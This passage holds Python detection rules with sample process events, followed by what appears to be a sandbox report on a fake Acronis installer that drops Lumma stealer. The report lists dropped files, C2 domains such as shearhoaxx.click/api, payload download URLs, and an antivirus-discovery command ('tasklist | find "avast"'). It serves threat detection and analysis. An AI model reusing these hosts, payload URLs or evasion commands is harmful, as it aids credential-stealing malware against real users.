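SAMPLE_EVENTS = [
    ProcEvent(14, 2, SAMPLE_EXE, r"C:\Windows\explorer.exe", '"acronis recovery expert deluxe 1.0.0.132.rarl.exe"'),
    ProcEvent(20, 14, CMD, SAMPLE_EXE, 'cmd /c "Palestine.com"'),
    # The dropped PE with a .com extension, run from Temp: rule 1 hit.
    ProcEvent(26, 20, r"C:\Users\user\AppData\Local\Temp\650429\Palestine.com", CMD, "Palestine.com"),
    # chcp.com is a legitimate Windows .com binary outside Temp: no hit.
    ProcEvent(28, 20, r"C:\Windows\System32\chcp.com", CMD, "chcp 65001"),
    # A cmd.exe driving tasklist into find: rule 2 hit.
    ProcEvent(74, 69, CMD, r"C:\Users\user\AppData\Local\Temp\installer.tmp", 'cmd /c tasklist | find /I "avast"'),
    ProcEvent(84, 74, r"C:\Windows\System32\tasklist.exe", CMD, "tasklist"),
    ProcEvent(86, 74, r"C:\Windows\System32\find.exe", CMD, 'find /I "avast"'),
    # A cmd.exe that only runs tasklist (common in admin scripts): no hit.
    ProcEvent(88, 2, CMD, r"C:\Windows\explorer.exe", "cmd /c tasklist"),
    ProcEvent(90, 88, r"C:\Windows\System32\tasklist.exe", CMD, "tasklist"),
]


def run(events=SAMPLE_EVENTS):
    """Apply both rules and return their hits keyed by rule name."""
    return {
        "temp_com_pids": [e.pid for e in find_temp_com_execution(events)],
        "tasklist_find_parents": find_tasklist_find_pairs(events),
    }


if __name__ == "__main__":
    for rule, hits in run().items():
        print(f"{rule}: {hits}")
```

Rule 2 keys on the parent PID rather than the command line because the pipeline is visible only as two sibling children of one cmd.exe; the find.exe arguments are kept in the event so an analyst can see which process names were searched for when a hit is reviewed.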

                No Antivirus matches
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\contactsUX.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msidcrl40.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dll | 48% | ReversingLabs | Win32.Trojan.Malgent
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe | 18% | ReversingLabs | Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\650429\Palestine.com | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe | 18% | ReversingLabs | Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\is-45OJH.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-I30SH.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-RLSFG.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AIControlLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsSQLHelper.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsusBusinessIntelligenceCPPLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUManufacturerCmdLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUTypeCmdLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DIMMCapacityLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMManufacturerLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMSpeedLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DeviceUninstall.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DiskMediaTypeLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FAN.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FanProfile.exe (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HWComponentPlugin.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HalUninstall.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HardDiskCapacityLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HttpUtilityV2.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ICSharpCode.SharpZipLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\KillProcess.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\LogHelper.exe (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\MB_Home.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.KeyVault.Core.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Blob.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Common.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\NICInfoLib.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Newtonsoft.Json.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\OPHWInfo.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\PocoInitializer.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Core.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Gui.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Network.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5OpenGL.dll (copy) | 0% | ReversingLabs | -
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kliplorihoe0.shop | 172.67.182.135 | true | false | - | unknown
shearhoaxx.click | 172.67.129.49 | true | true | - | unknown
slotwang.com | 45.66.248.134 | true | false | - | unknown
kliptedehoa.shop | 104.21.35.89 | true | false | - | unknown
cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMv | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
aspecteirs.lat | false | - | high
https://shearhoaxx.click/api | true | - | unknown
sustainskelet.lat | false | - | high
rapeflowwj.lat | false | - | high
energyaffai.lat | false | - | high
grannyejh.lat | false | - | high
necklacebudi.lat | false | - | high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://c.msn.com/c.gifmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                          high
                                          https://duckduckgo.com/chrome_newtabPalestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUPalestine.com, 00000011.00000003.1729130091.0000000006BED000.00000004.00000800.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000000.2019186157.0000000000591000.00000020.00000001.01000000.0000000D.sdmp, V2DDYDPIWYUTCJYUB0IV5.exe, 00000044.00000000.2346752958.0000000000CB7000.00000020.00000001.01000000.00000016.sdmpfalse
                                              high
                                              https://certs.securetrust.com/CA0:Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/ac/?q=Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2003/03/rmmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                    high
                                                    http://g.msn.com/1csauthx/authxmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                      high
                                                      http://www.hotmail.com/SHSetUnreadMailCountWmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                        high
                                                        http://g.msn.com/7MEAPPSDIR/1??DI=9647&HL=7hmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                          high
                                                          http://www.inkscape.org/)V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://web.resource.org/cc/V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://shearhoaxx.click:443/apigesPalestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.msn.com/webservices/spaces/v1/GetXmlFeedmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                    high
                                                                    https://www.autoitscript.com/autoit3/Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.vikingcloud.com/TWGCA.crl0tPalestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://kliplorihoe0.shop/Palestine.com, 00000011.00000002.2039631031.00000000048BC000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1992606677.00000000048B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://certs.securetrust.com/CA05Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://messenger.live.com/ws/2006/09/oim/Store2msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                              high
                                                                              https://shearhoaxx.click/api.Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.remobjects.com/ps5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmpfalse
                                                                                  high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.innosetup.com/5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmpfalse
                                                                                      high
                                                                                      http://msn.commsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                        high
                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.msn.com/webservices/spaces/v1/GetXmlFeedLouserzedConfig/ContactCard/GetXmlFeedRpsUrlmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                            high
                                                                                            https://certs.securetrust.com/CA0Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://config.messenger.msn.com/config/MsgrConfig.asmxmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.certum.pl/CPS0V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
URL | Source (process, memory dump; several sources separated by semicolons) | Malicious | Reputation
https://slotwang.com/file/Panorado.exeo% | Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://cevcsca2021.ocsp-certum.com07 | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp | false | unknown
https://kliptedehoa.shop | powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://www.hotmail.msn.com/ws/2004/09/oim/rsi | msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | unknown
https://slotwang.com/3 | Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://kliplorihoe0.shop/int_clp_ldr_pan.txtV | Palestine.com, 0000001F.00000002.2387321620.00000000015DF000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://crl.certum.pl/ctnca.crl0k | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2004/04/sc | msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp | false | high
http://www.entrust.net/rpa03 | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | false | high
https://shearhoaxx.click/api)5 | Palestine.com, 00000011.00000002.2040719422.0000000004A37000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://schemas.xmlsoap.org/ws/2002/07/utility | msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | high
http://www.macromedia.com/go/getflashplayer/ | msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | high
https://contoso.com/Icon | powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.autoitscript.com/autoit3/X | Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000000.1281744220.0000000000BC5000.00000002.00000001.01000000.00000009.sdmp; electronics.exe, 00000043.00000000.2223887416.0000000000345000.00000002.00000001.01000000.00000015.sdmp | false | high
http://ocsp.rootca1.amazontrust.com0: | Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmp | false | high
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp | false | unknown
http://nsis.sf.net/NSIS_ErrorError | acronis recovery expert deluxe 1.0.0.132.rarl.exe, 00000001.00000000.1249820381.0000000000409000.00000002.00000001.01000000.00000006.sdmp | false | high
https://shearhoaxx.click:443/api | Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600 | Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://www.ecosia.org/newtab/ | Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://rsi.hotmail.com/rsi/rsi.asmx | msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | unknown
http://www.gnu.org/licenses/lgpl-2.1.htmlF | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp | false | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/Pester/Pester | powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | false | high
http://libusb.info | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp | false | high
http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0 | Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.acronis.com/V | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp | false | high
https://slotwang.com/I | Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://g.msn.com | msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | high
http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp | false | high
https://shearhoaxx.click/K | Palestine.com, 00000011.00000003.1563852237.00000000048BF000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000003.1560361265.00000000048B9000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0 | Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.info-zip.org/ | msn.exe, 00000027.00000002.2156116548.00000000096F3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://kliplorihoe0.shop/int_clp_ldr_pan.txt( | Palestine.com, 00000011.00000002.2032778211.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://schemas.xmlsoap.org/ws/2004/04/trust | msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp | false | high
https://ows.messenger.msn.com/OimWS/oim.asmx | msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | unknown
http://ocsp.securetrust.com/0? | Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | false | high
https://kliplorihoe0.shop:443/int_clp_ldr_pan.txt1 | Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://messenger.msn.com/ct/getappcompat.aspx?lcid=%s | msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | high
http://www.inkscape.org/namespaces/inkscape | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp | false | high
http://crl.entrust.net/2048ca.crl0 | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | false | high
